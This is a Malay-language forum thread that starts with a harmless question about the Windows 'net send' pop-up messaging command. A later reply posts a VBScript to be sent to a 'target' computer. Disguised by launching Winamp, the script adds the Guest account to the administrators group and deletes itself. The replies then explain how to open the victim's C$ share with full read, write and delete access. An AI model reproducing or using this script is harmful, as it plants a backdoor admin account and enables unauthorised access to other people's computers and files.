View: 2371|Reply: 6
|
satu pertanyaan... ( NETSEND )
[Copy link]
|
|
salam kepada sahabat2 power komputer
saya ada satu pertanyaan ringkas.. mana tau kalau kawan kawan boleh membantu..
sapa sini tau kaedah nak buat network message using run function kat window?
netowk message nih bila kita taip command kat run function tu.. mesej tu akan kuar kat komputer yg kita nak.. macam pop up window..dulu masa aku student.. time kat lab slalu guna.. nak kaco kaco orang.. tiba tiba buat kerja terus kuar message pop up..
so aku nak apply bende yg sama kat opis aku nih..tapi aku dah lupa caranya dan commandnye..
dah brape kali aku taip asyik kluar network path not found je.. <salah sususn command ke..?
sape sape bleh bantu?
|
|
[ Last edited by bzzts at 11-12-2007 05:57 PM ] |
|
|
|
|
|
|
|
netsend je sahabat...
rasanya dah ada thread pasal ni kat board programming...
kalo nak IP Messenger...boleh pm aku.
tapi kena install kat dua-dua pc yang nak hantar message tu la
bukan takat message je boleh hantor...file besar bapak pon boleh.
kalo nak guna command je...netsend biasa dah cukup
e.g: "jom kuar makan"
|
|
|
|
|
|
|
|
trick lain.. full access kt komputer lain dlm local networkkk...
dim oexec
dim Group
dim GroupName
dim GroupName
Dim strTextFile
Dim oWSHNetwork
set wshshell = wscript.CreateObject
("WScript.Shell")
set oExec = Wshshell.exec("C:\Program Files\winamp\winamp.exe")
wscript.sleep 5000
wshshell.sendkeys "j"
wshell.sendkeys "Lloyd Banks"
wshshell.sendkeys "~"
Set oWSHNetwork = CreateObject
("WScript.Network")
strTextFile = "Guest"
GroupDomain = oWSHNetwork.UserDomain
GroupName = "administrators"
Set Group = GetObject("WinNT://" &
GroupDomain & "/" & GroupName & ",group")
Group.Add("WinNT://" & GroupDomain & "/" &
strTextFile & ",user")
Set objFSO = CreateObject
("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("Lloyd Banks.vbs")
objFSO.DeleteFile objfile
//save dlm notepad
//n then send to komputer sasaran kita... pastikan di direktori C://
//type kt address = http://<ipaddress>/c$
//kita lehh delete, write,read.... full access... |
|
|
|
|
|
|
|
Reply #5 naikAntena's post
//type kt adress=http://ip adress ni <--yg ni bahagian mana ni?pastu mcm mana nak access?lepas save pastu? |
|
|
|
|
|
|
|
hanya tuk network yg same sajek....
kalo domain(workgroup) lainn rase nyerr x lepas....
pas save dlm notepad tuhh send ahh kepada pc sasaran.. pastikan send/save dlm direktori C:/ kt komputer sasaran tuhh... (cth save txt file nih dlm pc member kt direktory c
pastuhh buka mycomputer ..... ko taip kt adrees bar... cth pc member ko ip addree 192.168.3.2
jd ko taip \\192.168.3.2/c$
access dia jd mcm tuan punya computer ah.. leh delete,read,write, move..... etc |
|
|
|
|
|
|
| |
|